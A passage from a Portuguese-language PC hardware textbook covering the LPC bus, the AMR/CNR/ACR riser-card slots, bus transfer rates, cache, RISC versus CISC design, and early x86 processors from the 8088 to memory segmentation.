LPC são feitas em 8 bits, assim como ocorre com todas as interfaces
que pretende atingir. Pode ainda realizar operações de DMA com 8,
16 e 32 bits, e operações de Bus Mastering com 8, 16 e 32 bits.

Figura 39

A figura 39 mostra o diagrama de tempo de uma transferência no


barramento LPC. As transferências são comandadas pelo sinal de
clock LCLK.

O sinal LFRAME é ativado em nível 0, indicando o início de um ciclo.

A seguir os comandos, endereços, dados e demais informações são


transmitidas através de LAD0-LAD3, em sequências de 4 bits a cada
clock.

164
Figura 40
Diagrama de um chip Super I/O para barramento LPC.

A maioria dos fabricantes de chips Super I/O produzem modelos para


o padrão LPC. A figura 40 mostra o diagrama do chip PC87360, pro-
duzido pela National Semiconductor. Possui diversas interfaces, e no
seu diagrama podemos ver os sinais de conexão com o barramento
LPC (Bus Interface). Note que existem ainda disponíveis os sinais
PIRQ3-PIRQ7, PIRQ9-PIRQ12, PIRQ14 e PIRQ15. Partindo do Su-
per I/O, esses sinais são enviados ao South Bridge, o chip no qual
estão integrados os controladores de interrupções. Através dele as
interfaces existentes no Super I/O podem interromper o processador.

Barramentos AMR, CNR e ACR

Muitas placas de CPU modernas possuem conectores para a instala-


ção de um riser card. São os slots AMR, CNR e ACR. Um riser card é
uma placa de interface especial, cujo principal objetivo é a redução de
custo. A ideia básica dessas placas é dividir cada interface em duas
partes. Uma parte, totalmente digital e de baixo custo, é embutida no
chipset. A outra parte, mais voltada para funções analógicas, fica no
riser card. A comunicação entre o chipset da placa de CPU e o Riser
Card é feita em um formato serial, utilizando um reduzido número de
pinos.

O primeiro padrão de riser card foi o AMR (Audio Modem Riser). Des-
tinava-se a ser usado apenas com circuitos de som e modem. Para

165
utilizar essas placas é preciso ter no chipset, os circuitos de áudio
AC’97 e de modem MC’97. Muitos chipsets modernos possuem tais
circuitos. Os circuitos de som AC’97 são relativamente simples, mas
com boa qualidade. Os circuitos MC’97 são similares aos existentes
nos soft modems. Toda a parte digital desses dispositivos fica locali-
zada no chipset, e a parte analógica fica em uma placa de expansão
AMR, que deve ser instalada no slot apropriado. A figura 41 mostra
um slot AMR.

Figura 41
Slot AMR em uma placa de CPU.

Depois do AMR, a Intel criou um novo padrão, o CNR (Communica-


tions Network Riser). O tipo de slot é idêntico ao usado pelo padrão
AMR. Neste slot podemos instalar riser cards com funções de áudio,
modem e rede. As placas AMR e CNR têm formatos semelhantes,
como a que vemos na figura 42.

Figura 42
Uma placa de Rede/Áudio CNR.

166
Portanto o CNR é um padrão similar ao AMR, porém suporta funções
de rede. Existe uma diferença entre as localizações dos slots AMR e
CNR. Normalmente as placas de CPU possuem um ou outro tipo,
mas não ambas. O slot à esquerda de todos os slots PCI é o CNR
(olhando a placa de CPU pela frente do gabinete). O slot localizado à
direita é um AMR.
Figura 43
Localização dos slots AMR e CNR.

Podemos então considerar que usar uma placa AMR ou CNR é o


mesmo que utilizar uma placa de som simples, ou um soft modem, ou
uma interface de rede comum. A diferença é que parte dos circuitos
ficam no chipset (SouthBridge e Super I/O) e parte fica no riser card.
Existem vários tipos de riser card no mercado: modem, áudio, áu-
dio+modem, áudio+rede, modem+rede, modem+áudio+USB, etc.

O padrão ACR, promovido pela AMD e outros fabricantes de modems


e produtos de comunicação, é compatível com o AMR, e também
oferece funções de rede, USB e comunicação em banda larga. Seu
slot possui mais pinos, e é similar ao slot PCI, porém com uma fixa-
ção mecânica diferente.

Na figura 44 vemos uma placa ACR. É bem parecida com uma placa
PCI, entretanto não pode ser encaixada em um slot PCI. Note que o
chanfro existente no conector da placa fica na posição simétrica em
relação à dos slots PCI de 5 volts comuns nas placas de CPU. O
conector ACR existente na placa de CPU é do mesmo tipo usado
pelos slots PCI, mas além da posição ser invertida, o conector é ligei-
ramente deslocado para a parte traseira do gabinete, o que impede o
encaixe de placas ACR em slots PCI, e vice-versa. A localização do
conector ACR na placa de CPU é a mesma do conector CNR, ou
seja, à esquerda dos slots PCI.

167
Figura 44
Uma placa ACR.

A ideia básica do ACR é a mesma do AMR e do CNR: produzir inter-


faces simples, com a parte digital localizada no chipset e a parte ana-
lógica localizada no riser card.

Muitos fabricantes estão produzindo riser card dos tipos AMR/CNR e


ACR. Diversos chipsets da Intel, VIA e SiS estão embutindo circuitos
como o áudio AC’97 e modem MC’97, restando apenas instalar o
riser card apropriado para ter acesso a esses recursos. As interfaces
USB também já estão presentes nos chipsets, faltando apenas rotear
seus dados para o riser card. A tendência é que os chipsets passem
a utilizar embutidos também os circuitos de rede e de comunicação
em geral. Mesmo quando os circuitos não estão embutidos no
chipset, os barramentos AMR, CNR e ACR podem ser usados, pois
existem diversos chips independentes, de baixo custo, que podem ser
utilizados pelos fabricantes de placas de CPU.

Note ainda que a maioria das placas de CPU com som on-board,
utilizam os circuitos de áudio AC’97. Ao invés de utilizarem um riser
card, os fabricantes acrescentam na própria placa de CPU os circui-
tos que estariam no riser card de áudio, e usam os tradicionais conec-
tores de áudio na parte traseira da placa de CPU. Desta forma o áu-
dio AC’97 pode ser utilizado, sem que seja preciso instalar um riser
card.

168
Ainda é muito difícil encontrar riser cards no comércio, porém seus
fabricantes apostam que nos próximos anos serão as opções mais
comuns para soft modems e outras interfaces de baixo custo.

Velocidades dos principais barramentos

O desempenho de uma placa conectada a um barramento depende


de vários fatores, entre os quais, a taxa de transferência. Esta por sua
vez, depende do número de bits, do clock e do número de transferên-
cias feitas a cada ciclo. A tabela que se segue mostra as característi-
cas dos barramentos ISA, PCI e AGP.

Barramento Bits Clock Trans- Taxa de


ferên- transferên-
cias cia
por
ciclo
ISA 16 8 MHz 1/2 8 MB/s
PCI 33 MHz 32 bits 32 33 MHz 1 133 MB/s
PCI 33 MHz 64 bits 64 33 MHz 1 266 MB/s
PCI 66 MHz 32 bits 32 66 MHz 1 266 MB/s
PCI 66 MHz 64 bits 64 66 MHz 1 533 MB/s
AGP 1x 32 66 MHz 1 266 MB/s
AGP 2x 32 66 MHz 2 533 MB/s
AGP 4x 32 66 MHz 4 1066 MB/s
AGP 8x 32 66 MHz 8 2133 MB/s

O barramento ISA utiliza um clock de 8 MHz, e realiza transferências


de 8 ou 16 bits. Usando 16 bits, teoricamente poderia transferir 16
MB/s (8 MHz x 2 bytes), mas cada transferência utiliza 2 ciclos de
clock, como era exigido pelas placas de expansão do início dos anos
80, que eram muito lentas. Portanto realiza em média, meia transfe-
rência a cada ciclo. Desta forma, a taxa de transferência obtida com o
ISA é de apenas 8 MB/s.

O barramento PCI mais simples utiliza um clock de no máximo 33


MHz, com transferências de 32 bits. Isto resulta em uma taxa de
transferência igual a 132 MB/s (33 MHz x 4 bytes). As versões de 64

169
bits e 66 MHz resultam em taxas mais elevadas, chegando até 533
MB/s.

O barramento AGP não está ligado ao PCI, e sim, ao barramento


externo do processador, apesar de ter muitas características similares
às do PCI. No chamado modo AGP 1x, em cada ciclo AGP é feita
uma transferência, resultando em uma taxa de 266 MB/s. Como já
mostramos, os modos AGP 2x, AGP 4x e AGP 8x fornecem 533
MB/s, 1066 MB/s e 2133 MB/s, respectivamente.

Essas comparações mostram como uma placa de vídeo PCI simples


opera com taxa de transferência mais lenta (133 MB/s) que um mode-
lo AGP. Muitos modelos de placas de vídeo são atualmente produzi-
dos nas versões AGP e PCI, sendo que as versões PCI destinam-se
a upgrades, ou seja, melhorar o sistema de vídeo de PCs antigos.
Com o passar do tempo, serão cada vez mais raras as placas de
vídeo PCI.

Note que todas essas taxas de transferências são limites máximos


teóricos, que na prática não são atingidos. Devemos levar em conta
as latências dos barramentos, que necessitam do fornecimento inicial
de endereço e comando, uso de wait states e outros eventos que
causam overhead, resultando em taxas de transferência efetivas bem
menores. De qualquer forma, os limites máximos teóricos mostrados
na tabela servem como comparação do potencial de cada um desses
barramentos.

Processadores do 8086 ao Core

Apesar do processador ser o componente mais importante do micro,


já que é ele quem processa quase todas as informações, ele não é
necessariamente o maior responsável pelo desempenho.

Na verdade, dependendo da aplicação à qual o micro se destina, o


desempenho do processador pode ser menos importante que a quan-
tidade de memória RAM, que o desempenho da placa de vídeo 3D,
ou até mesmo que o desempenho do disco rígido.

170
Tenha em mente que o computador é um conjunto, cada componente
depende dos demais para mostrar o seu potencial.

Dizemos que um micro é tão rápido quanto seu componente mais


lento. Como estamos falando de um conjunto, apenas um componen-
te que apresente uma baixa performance será suficiente para colocar
tudo a perder. Assim como vemos em outras situações, num carro
por exemplo, onde um simples pneu furado pode deixar o carro para-
do na estrada.

Se o micro tiver pouca memória RAM por exemplo, o sistema opera-


cional será obrigado a usar memória virtual, limitando a performance
ao desempenho do disco rígido, que é centenas de vezes mais lento
que ela. Caso o micro não possua memória cache, o desempenho
ficará limitado ao desempenho da memória RAM, que é muito mais
lenta que o processador e por aí vai.

Dizemos neste caso, que o componente de baixo desempenho é um


gargalo, pois impede que o conjunto manifeste todo o seu potencial.
Às vezes, simplesmente aumentar a quantidade de memória RAM,
operação que custa relativamente pouco, é capaz de aumentar con-
sideravelmente a velocidade do micro.

Mas, apesar de tudo, o processador ainda é o componente básico de


qualquer PC. Com o avanço cada vez mais rápido da tecnologia, e
várias empresas disputando o mercado, os projetistas vem sendo
obrigados a desenvolver projetos cada vez mais ousados a fim de
produzir os processadores com o melhor desempenho. Isso é exce-
lente para nós, mas também pode trazer armadilhas, já que com pro-
jetos tão diferentes, cada processador acaba saindo-se bem em al-
gumas aplicações, mas muito mal em outras.

Não dá para julgar o desempenho do processador apenas pela fre-


quência de operação, como fazíamos na época do 486, os tempos
mudaram.

Mas, já que está aqui, que tal conhecermos os avanços pelos quais
os processadores passaram até chegar aos dias de hoje? Vamos
discutir primeiro algumas características básicas dos processadores,

171
conhecer os pioneiros da década de 70 e avançar pelos anos 80 e
90, até chegar nos dias de hoje. Apertem os cintos.

Características dos processadores modernos

Existem no mercado vários modelos de processadores, que apresen-


tam preços e desempenho bem diferentes. Este tópico inicial se des-
tina a estabelecer os diferenciais básicos que determinam a perfor-
mance de um processador, a parte teórica que vai lhe ajudar a com-
preender a diferença entre os processadores que vamos examinar
com detalhes mais adiante.

Quando vamos comprar um processador, a primeira coisa que per-


guntamos é qual sua frequência de operação, medida em Mega-
hertz (MHz) ou milhões de ciclos por segundo, frequência também
chamada de clock. Acontece, que nem sempre um processador com
uma velocidade de operação mais alta é mais rápido do que outro
que opera a uma frequência um pouco mais baixa. A frequência de
operação de um processador indica apenas quantos ciclos de pro-
cessamentos são realizados por segundo, o que cada processador é
capaz de fazer em cada ciclo já é outra história.

Imagine um processador 486 de 100 MHz, ao lado de um Pentium


também de 100 MHz. Apesar da frequência de operação ser a mes-
ma, o 486 perderia feio em desempenho. Na prática, o Pentium seria
pelo menos 2 vezes mais rápido. Isto acontece devido à diferenças
na arquitetura dos processadores e também no coprocessador arit-
mético e cache.

Coprocessador aritmético

Todos os processadores da família x86, usada em micros PC, são


basicamente processadores de números inteiros. Muitos aplicativos
porém, precisam utilizar valores de maior precisão, assim como fun-
ções matemáticas complexas, como Seno, Coseno, Tangente, Veto-
riação, etc., para realizar suas tarefas. Este é o caso dos programas
de CAD, planilhas, jogos com gráficos tridimensionais e de proces-
samento de imagens em geral.

172
A função do coprocessador aritmético é justamente auxiliar o proces-
sador principal no cálculo destas funções complexas, cada vez mais
utilizadas, principalmente em jogos. É como um matemático profissi-
onal que ajuda o processador a resolver os problemas mais comple-
xos, que ele demoraria muito para resolver sozinho.

Até o 386, o coprocessador era apenas um acessório que podia ser


comprado à parte e instalado num encaixe apropriado da placa mãe,
sendo que cada modelo de processador possuía um modelo equiva-
lente de coprocessador. O 8088 utilizava o 8087, o 286 o 287, o
386SX e 386DX utilizavam respectivamente o 387SX e o 387DX e o
486SX utilizava 487DX. O problema nesta estratégia é que como
poucos usuários equipavam seus micros com coprocessadores arit-
méticos, a produção destes chips era baixa, e consequentemente os
preços eram altíssimos, chegando ao ponto de em alguns casos o
coprocessador custar mais caro que o processador principal. Com o
aumento do número de aplicativos que necessitavam do coprocessa-
dor, sua incorporação ao processador principal a partir do 486DX foi
um passo natural. Com isso, resolveu-se também o problema do cus-
to de produção dos coprocessadores, barateando o conjunto.

Atualmente, o desempenho do coprocessador determina o desempe-


nho do micro em jogos e aplicativos gráficos em geral, justamente as
aplicações onde os processadores atuais são mais exigidos. Infeliz-
mente, o desempenho do coprocessador é uma característica que
varia muito entre os processadores atuais.

Encaixe para o coprocessador aritmético

173
Memória Cache

Enquanto os processadores tornaram-se quase 10 mil vezes mais


rápidos desde o 8088 (coprocessador usado no XT), a memória RAM,
sua principal ferramenta de trabalho, pouco evoluiu em performance.

Quando foram lançados os processadores 386, percebeu-se que as


memórias não eram mais capazes de acompanhar o processador em
velocidade, fazendo com que muitas vezes ele tivesse que ficar “es-
perando” os dados serem liberados pela memória RAM para poder
concluir suas tarefas, perdendo muito em desempenho.

Se na época do 386 a velocidade das memórias já era um fator limi-


tante, imagine o quanto este problema não atrapalharia o desempe-
nho dos processadores que temos atualmente.
Para solucionar este problema, começou a ser usada a memória ca-
che, um tipo ultra rápido de memória que serve para armazenar os
dados mais frequentemente usados pelo processador, evitando na
maioria das vezes que ele tenha que recorrer à comparativamente
lenta memória RAM. Sem ela, o desempenho do sistema ficará limi-
tado à velocidade da memória, podendo cair em até 95%!. São usa-
dos dois tipos de cache, chamados de cache primário, ou cache L1
(level 1), e cache secundário, ou cache L2 (level 2).

O cache primário é embutido no próprio processador e é rápido o


bastante para acompanhá-lo em velocidade. Sempre que um novo
processador é desenvolvido, é preciso desenvolver também um tipo
mais rápido de memória cache para acompanhá-lo.

Como este tipo de memória é extremamente caro (chega a ser algu-


mas centenas de vezes mais cara que a memória RAM convencional)
usamos apenas uma pequena quantidade dela. O 486 traz apenas 8
KB, o Pentium traz 16 KB, enquanto o Pentium II e o Pentium III tra-
zem 32 KB, enquanto o Athlon e o Duron da AMD trazem 128 KB.

Para complementar, usamos também um tipo um pouco mais lento de


memória cache na forma do cache secundário, que por ser muito
mais barato, permite que seja usada uma quantidade muito maior.

174
Nos micros 486 o mais comum é o uso de 128 ou 256 KB de cache
L2, enquanto nos micros mais modernos o mais comum é o uso de
512 KB. Dependendo do processador usado, o cache L2 pode vir
embutido no próprio processador ou fazer parte da placa mãe.

Sempre que o processador precisar ler dados, os procurará primeiro


no cache L1. Caso o dado seja encontrado, o processador não perde-
rá tempo, já que o cache primário funciona na mesma frequência que
ele. Caso o dado não esteja no cache L1, então o próximo a ser inda-
gado será o cache L2. Encontrando o que procura no cache secundá-
rio, o processador já perderá algum tempo, mas não tanto quanto
perderia caso precisasse acessar diretamente a memória RAM.

Por outro lado, caso os dados não estejam em nenhum dos dois ca-
ches, não restará outra saída senão perder vários ciclos de proces-
samento esperando que eles sejam entregues pela lenta memória
RAM.

Para exemplificar, imagine que você estivesse escrevendo um e-mail


e de repente precisasse de uma informação que você havia anotado
em um papel. Se o papel estivesse sobre sua mesa, você poderia lê-
lo sem perder tempo. Se estivesse dentro de uma gaveta da sua me-
sa, já seria necessário algum tempo para encontrá-lo enquanto se ele
estivesse perdido em algum lugar de um enorme fichário do outro
lado da sala, seria preciso um tempo enorme.

Antigamente, era comum as placas mães virem com soquetes apro-


priados, que permitiam ao usuário adicionar mais memória cache
caso quisesse. Os módulos adicionais, chamados de módulos CO-
AST (cache on a stick) eram relativamente acessíveis, levando muita
gente a fazer o upgrade. Entretanto, atualmente esta possibilidade
não existe mais, pois a grande maioria dos processadores já trazem o
cache L2 integrado, não permitindo qualquer modificação, já que não
dá para abrir o processador e soldar mais cache. Mesmo no caso de
processadores que ainda usam cache embutido na placa mãe, como
o K6-2, não existe mais o encaixe para adicionar mais cache. Ou
seja, atualmente a quantidade de cache que você deseja no proces-
sador ou placa mãe deve ser decidida antes da compra, baseado nas

175
opções disponíveis. Uma vez adquiridos o processador e a placa mãe
não será possível fazer qualquer alteração.

Processadores RISC X Processadores CISC

Sempre houve uma grande polêmica em torno de qual dessas plata-


formas é melhor. Talvez você ache inútil eu estar falando sobre isto
aqui, mas é interessante que você compreenda a diferença entre
estas duas plataformas, para entender vários aspectos dos processa-
dores modernos.

Um processador CISC (Complex Instruction Set Computer, ou “com-


putador com um conjunto complexo de instruções”), é capaz de exe-
cutar várias centenas de instruções complexas diferentes, sendo ex-
tremamente versátil. Exemplos de processadores CISC são o 386 e o
486.

No começo da década de 80, a tendência era construir chips com


conjuntos de instruções cada vez mais complexos. Alguns fabricantes
porém, resolveram seguir o caminho oposto, criando o padrão RISC
(Reduced Instruction Set Computer, ou “computador com um conjunto
reduzido de instruções”). Ao contrário dos complexos CISC, os pro-
cessadores RISC são capazes de executar apenas algumas poucas
instruções simples. Justamente por isso, os chips baseados nesta
arquitetura são mais simples e muito mais baratos. Outra vantagem
dos processadores RISC, é que, por terem um menor número de
circuitos internos, podem trabalhar a frequências mais altas.

Um exemplo são os processadores Alpha, que em 97 já operavam a


600 MHz. Pode parecer estranho que um chip que é capaz de execu-
tar algumas poucas instruções, possa ser considerado por muitos,
mais rápido do que outro que executa centenas delas, seria como
comparar um professor de matemática com alguém que sabe apenas
as quatro operações. Mas, um processador RISC é capaz de execu-
tar tais instruções muito mais rapidamente. A ideia principal, é que
apesar de um processador CISC ser capaz de executar centenas de
instruções diferentes, apenas algumas são usadas frequentemente.
Poderíamos então criar um processador otimizado para executar
apenas estas instruções simples que são mais usadas. Como de

176
qualquer forma, pouca gente programa diretamente em Assembly,
bastaria alterar os compiladores, para que os programas fossem
compatíveis com os novos processadores.

É indiscutível, porém, que em muitas tarefas os processadores CISC


saem-se melhor, principalmente pelo seu grande número de recursos.
Por isso, ao invés da vitória de uma das duas tecnologias, atualmente
vemos processadores híbridos, que são essencialmente processado-
res CISC, mas incorporam muitos recursos encontrados nos proces-
sadores RISC (ou vice-versa).

Apesar de por questões de Marketing, muitos fabricantes ainda ven-


derem seus chips, como sendo “Processadores RISC”, não existe
praticamente nenhum processador atualmente que siga estritamente
uma das duas filosofias. Tanto processadores da família x86, como o
Pentium II, Pentium III e AMD Athlon, quanto processadores supos-
tamente RISC, como o MIPS R10000 e o HP PA-8000 misturam ca-
racterísticas das duas arquiteturas, por simples questão de perfor-
mance.

A última coisa que os fabricantes de processadores são é teimosos,


sempre que aparece uma solução melhor, a antiga e abandonada.

Examinando de um ponto de vista um pouco mais prático, a vanta-


gem de uma arquitetura CISC é que já temos muitas das instruções
guardadas no próprio processador, o que facilita o trabalho dos pro-
gramadores, que já dispõe de praticamente todas as instruções que
serão usadas em seus programas. No caso de um chip estritamente
RISC, o programador já teria um pouco mais de trabalho, pois como
disporia apenas de instruções simples, teria sempre que combinar
várias instruções sempre que precisasse executar alguma tarefa mais
complexa. Seria mais ou menos como se você tivesse duas pessoas,
uma utilizando uma calculadora comum, e outra utilizando uma calcu-
ladora cientifica. Enquanto estivessem sendo resolvidos apenas cál-
culos simples, de soma, subtração, etc. quem estivesse com a calcu-
ladora simples poderia até se sair melhor, mas ao executar cálculos
mais complicados, a pessoa com a calculadora científica disporia de
mais recursos.

177
Nos chips atuais, que são na verdade misturas das duas arquiteturas,
juntamos as duas coisas. Internamente, o processador processa ape-
nas instruções simples. Estas instruções internas, variam de proces-
sador para processador, são como uma luva, que se adapta ao proje-
to do chip.

As instruções internas de um K6 são diferentes das de um Pentium


por exemplo. Sobre estas instruções internas, temos um circuito de-
codificador, que converte as instruções complexas utilizadas pelos
programas em várias instruções simples que podem ser entendidas
pelo processador. Estas instruções complexas sim, são iguais em
todos os processadores usados em micros PC. É isso que permite
que um K6 e um Pentium sejam compatíveis entre si.

O conjunto básico de instruções usadas em micros PC é chamado de


conjunto x86. Este conjunto é composto por um total de 187 instru-
ções, que são as utilizadas por todos os programas. Além deste con-
junto principal, alguns processadores trazem também instruções al-
ternativas, que permitem aos programas executar algumas tarefas
mais rapidamente do que seria possível usando as instruções x86
padrão. Alguns exemplos de conjuntos alternativos de instruções são
o MMX (usado a partir do Pentium MMX), o 3D-NOW! (usado pelos
processadores da AMD, a partir do K6-2), e o SSE (suportado pelo
Pentium III).

PCs x Macs

Continuando na discussão de processadores RISC e CISC, vamos


estudar um pouco sobre a arquitetura de dois processadores atuais, o
G4, utilizado nos micros Macintosh e o AMD Athlon, usado em micros
PC.

Existe uma ideia geral de que o G4, usado nos Macs é um processa-
dor RISC, enquanto os processadores usados em micros PC, incluin-
do o Pentium III e o Athlon são todos CISC. Ambas as afirmações
estão erradas. Na verdade, tanto o G4, quanto o Athlon e o Pentium
III são considerados processadores Post-RISC, processadores que
possuem um conjunto de instruções gigantesco, maior do que o con-
junto de instruções de um processador CISC típico. A diferença é que

178
toda essa gigantesca gama de instruções diferentes, podem ser de-
codificadas em instruções RISC simples, estas sim que serão proces-
sadas. A “conversão” das instruções é feita por um componente es-
pecial do processador, chamado de Hardware Decoder, encontrado
tanto no G4 quanto no Athlon.

O G4 possui um enorme conjunto de instruções, assim como os pro-


cessadores x86, mas todas instruções que podem ser convertidas
pelo Hardware decoder e em seguida processadas. O Hardware De-
coder é extremamente rápido, por isso não compromete o desempe-
nho do processador. De fato, a perda de desempenho por usar este
grande conjunto de instruções que precisam ser quebradas em ins-
truções menores é de menos de 1%. É por isso que os processado-
res atuais abandonaram a ideia RISC original: a perda de desempe-
nho é ínfima perto do ganho de flexibilidade.

O Athlon por sua vez, tem que ser compatível com o conjunto de ins-
truções x86, caso contrário não poderia ser usado em micros PC. As
instruções x86 consistem em basicamente dois tipos de instruções,
as instruções simples, que podem ser diretamente processadas pelo
Hardware decoder, sem perda de tempo, e as instruções complexas,
que são quebradas em instruções simples por outro componente,
chamado Microcode decoder.

As instruções simples, que podem ser diretamente processadas, são


as mais frequentemente usadas nos programas. De fato, num pro-
grama atual típico, é composto de entre 95 e 97% destas instruções
simples.

O restante são as instruções complexas, que apesar de raramente


usadas são as que dão mais trabalho, pois precisam passar por um
processo de decodificação muito mais lento, feito pelo Microcode
Decoder. Para amenizar este problema, a AMD incluiu um buffer de
pré extração no Athlon, que funciona como uma espécie de fila por
onde as instruções já decodificadas passam antes de ser processa-
das. Graças a isto, o processador pode processar outras instruções
enquanto aguarda o Microcode Decoder decodificar cada instrução
complexa, sem perder muito tempo. Com isto, mesmo mantendo
compatibilidade com o conjunto de instruções x86, o Athlon perde

179
muito pouco em desempenho em relação ao G4, isto naturalmente
comparando dois processadores de mesma frequência. O IPC, ou
seja, o número de instruções processadas por ciclo de ambos é muito
próximo, o que garante que um Athlon de 500 MHz apresente um
desempenho muito parecido com um G4 também de 500 MHz.

Front End e Back End

Qualquer processador atual pode ser dividido em dois blocos básicos,


o Front End e o Back End. O Front End corresponde aos circuitos que
decodificam as instruções, no caso o Hardware decoder, Microcode
decoder e buffer de pré extração que acabei de explicar, junto com
mais alguns componentes, como os circuitos de Branch Prediction
(que ordenam as instruções de forma que o processador possa pro-
cessador o maior número possível de instruções por ciclo e o cache
L1.

Estes componentes são a “porta de entrada” do processador, tendo a


função de preparar as instruções para serem processadas.

O Back End é a parte do processador que finalmente processa as


instruções, sendo composto basicamente pelas unidades de execu-
ção.

Como vimos, o fato como ambos os processadores decodificam as


instruções, contando com o Hardware decoder é bastante semelhan-
te, mas o Athlon possui alguns componentes a mais para garantir
compatibilidade com as instruções x86. Isto não atrapalha o desem-
penho do processador, mas o torna um projeto mais complexo.

Em termos de unidades de execução, ou seja, o Back End, é que os


processadores mostram mais algumas diferenças na forma como
processam as instruções já decodificadas.

O Athlon possui um total de 9 unidades de execução, enquanto o G4


possui apenas 6. A diferença parece grande, mas na prática o de-
sempenho é quase o mesmo, veja por que:
O Athlon possui 3 unidades de execução para leitura/gravação de
dados na memória, enquanto o G4 possui apenas uma.

180
O ponto é que todas as instruções, tanto de inteiros, quanto de ponto
flutuante no Athlon, vem com um espaço reservado para uma instru-
ção de leitura/gravação, espaço que nem sempre é preenchido, fa-
zendo com que as 3 unidades fiquem ociosas na maior parte do tem-
po, apesar de agilizarem algo de vez em quando.

No G4, só existe uma unidade de leitura/gravação, mas que em com-


pensação fica ocupada na maior parte do tempo. Na prática, esta
única unidade acaba fazendo o mesmo volume de trabalho das três
do Athlon, que ficam boa parte do tempo ociosas. Sem dúvida, o G4
perde alguma coisa em termos de desempenho, mas muito pouco.

Em termos de unidades de execução de inteiros e de ponto flutuante,


que são as mais importantes, temos especificações parecidas em
ambos: O Athlon possui três unidades de ponto flutuante (que formam
o coprocessador aritmético), o mesmo número encontrado no G4.

Apenas para efeito de comparação, o Pentium 3 possui apenas duas.


Com o mesmo número de unidades, o desempenho dos dois proces-
sadores no quesito ponto flutuante é quase igual.

Já em termos de unidades de processamento de inteiros, o cenário


muda um pouco de figura, pois o Athlon possui três unidades de exe-
cução contra apenas duas do G4. Isto garante que o Athlon tenha um
desempenho um pouco melhor que o G4 em aplicativos de escritó-
rios, mas a diferença é pequena, pois o desempenho real também
depende do cache, velocidade de acesso à memória, etc. Em termos
de instruções 3D, o Athlon conta com o 3D-Now, o famoso conjunto
de instruções, embutido nos processadores AMD que permite melho-
rar o desempenho do processador em jogos e aplicativos 3D. O
Athlon traz também o velho MMX, que garante algum ganho em apli-
cativos multimídia.

O G4 por sua vez traz um conjunto unificado, o Altivec, que inclui


tanto instruções 3D (como no 3D-Now!), quanto instruções multimídia
(como no MMX), isto garante que tanto o Athlon quanto o G4 possu-
am armas semelhantes neste quesito, o resto fica por conta dos pro-
gramadores.

181
Do 8086 ao Core

O primeiro microprocessador foi lançado pela Intel em 1971 e se


chamava i4004. Este era um processador extremamente simples,
formado por pouco mais de 2000 transístores, mas que foi o precur-
sor dos processadores que temos atualmente.

A chamada lei de Moore, que leva o nome do fundador da Intel, Gor-


don Moore, prega que a potência dos processadores dobra a cada 18
meses. Apesar desta previsão ter sido feita no final da década de 70,
continuou mantendo-se verdadeira até os dias de hoje, com uma
precisão notável. De lá pra cá, foi um longo caminho.

Enormes investimentos foram feitos e muitos dos maiores gênios do


planeta trabalharam em busca de soluções para questões cada vez
mais complexas.

Vamos agora examinar os avanços feitos desde o 8088, usado no


XT, até o Pentium, onde estudaremos quando e porque recursos
como o modo protegido e a multiplicação de clock foram introduzidos,
e no que eles afetam o funcionamento do processador. Entendendo
estes conceitos, você poderá facilmente entender as diferenças entre
os processadores Pentium III, Athlon, K6-3 etc. que temos atualmente
e veremos com mais detalhes adiante, assim como dos processado-
res que vierem a ser lançados futuramente que, pode ter certeza,
continuarão utilizando os mesmos conceitos básicos.

8088

O 8088 era na verdade uma versão economica do processador 8086,


que havia sido lançado pela Intel em 78. Quando a IBM estava de-
senvolvendo seu computador pessoal, chegou a ser cogitado o uso

182
do 8086, mas acabou sendo escolhido o 8088 devido ao seu baixo
custo.

Tanto o 8086 quanto o 8088 são processadores de 16 bits e eram


considerados avançadíssimos para a época, apesar de serem extre-
mamente simples para os padrões atuais. A diferença entre eles é
que o 8088, apesar de internamente trabalhar com palavras binárias
de 16 bits, usava um barramento de apenas 8 bits, o que permitiu à
IBM utilizar os mesmos componentes usados nos computadores de 8
bits da época, que eram muito mais baratos do que os periféricos de
16 bits.

Esta arquitetura permitiu ao primeiro PC competir na mesma faixa de


preço dos computadores de 8 bits mais populares e, ao mesmo tem-
po, possuir um desempenho bem superior devido ao seu processador
de 16 bits. O 8088 é capaz de acessar até 1 MB de memória RAM, e
funciona a 4.77 MHz, recursos incríveis para a época, já que estamos
falando de um processador lançado no final de 1979.

Falando em recursos, só para matar sua curiosidade, o PC original da


IBM, lançado em Agosto de 1981 possuía apenas 64 KB de memória
RAM (a versão mais simples vinha com apenas 16 KB), monitor MDA
mono de 12 polegadas, usava uma unidade de disquetes de 5 1/4 de
apenas 160 KB e vinha sem disco rígido. O sistema operacional usa-
do era o MS-DOS 1.0 (na época ainda chamado de PC-DOS), que foi
desenvolvido pela Microsoft com base num sistema operacional mais
simples, chamado QDOS, comprado da Seattle Computers, uma pe-
quena empresa desenvolvedora de sistemas.

Na verdade, a Microsoft foi a segunda opção da IBM, depois de ter


sua proposta de licença recusada pela Digital Research, que na épo-
ca desenvolvia versões do seu CP/M para várias arquiteturas diferen-
tes.

Dois anos depois, foi lançado o PC XT, que apesar de continuar


usando o 8088 de 4.77 MHz, vinha bem mais incrementado, com 256
KB de RAM, disco rígido de 10 MB, monitor CGA e o MS-DOS 2.0.
Mesmo com o surgimento dos micros 286, o XT ainda continuou sen-
do bastante vendido, pois era mais barato. Fabricantes de clones

183
criaram projetos de micros XTs mais avançados, equipados com pro-
cessadores 8088 de 8 MHz, discos rígidos maiores e até 640 KB de
memória RAM.

Segmentação de Endereços

Um recurso bem interessante, usado no 8088, é a segmentação de


endereços, que permitiu aumentar a quantidade de memória RAM
suportada pelo processador.

Para que o processador possa acessar a memória RAM, é preciso


que a memória seja dividida em endereços. Cada byte depositado na
memória recebe um endereço único, assim como cada rua do Brasil
tem um CEP diferente. Como o 8088 pode lidar apenas com palavras
binárias de 16 bits, a princípio não seria possível para ele acessar
mais do que 64 Kbytes de memória RAM, já que 16 bits permitem
apenas 65,536 combinações diferentes (2 elevado à 16ª potência).

Se o 8088 pudesse acessar apenas 64 KB de memória RAM, os mi-


cros baseados nele seriam muito limitados e poderiam apenas rodar
programas muito simples. Para você ter uma ideia, 64 KB não dariam
nem mesmo para carregar o DOS 3.0.

Para solucionar este problema, foi adotada uma solução bastante


engenhosa, apesar do processador continuar podendo acessar ape-
nas 64 KB de memória de cada vez, foram criados mais 4 bits de
endereçamento, que permitem o acesso a 16 blocos de memória.
Como cada bloco possui 64 KB, chegamos a 1 MB inteiro de capaci-
dade total. Basicamente criamos 16 áreas diferentes de memória,
cada uma com 64 KB, que é o máximo que o 8088 pode endereçar.

O processador pode acessar uma única área de cada vez. Se por


exemplo, está sendo usado o bloco 1, e de repente é preciso ler um

184
dado gravado no bloco 2, é preciso limpar todos os endereços relati-
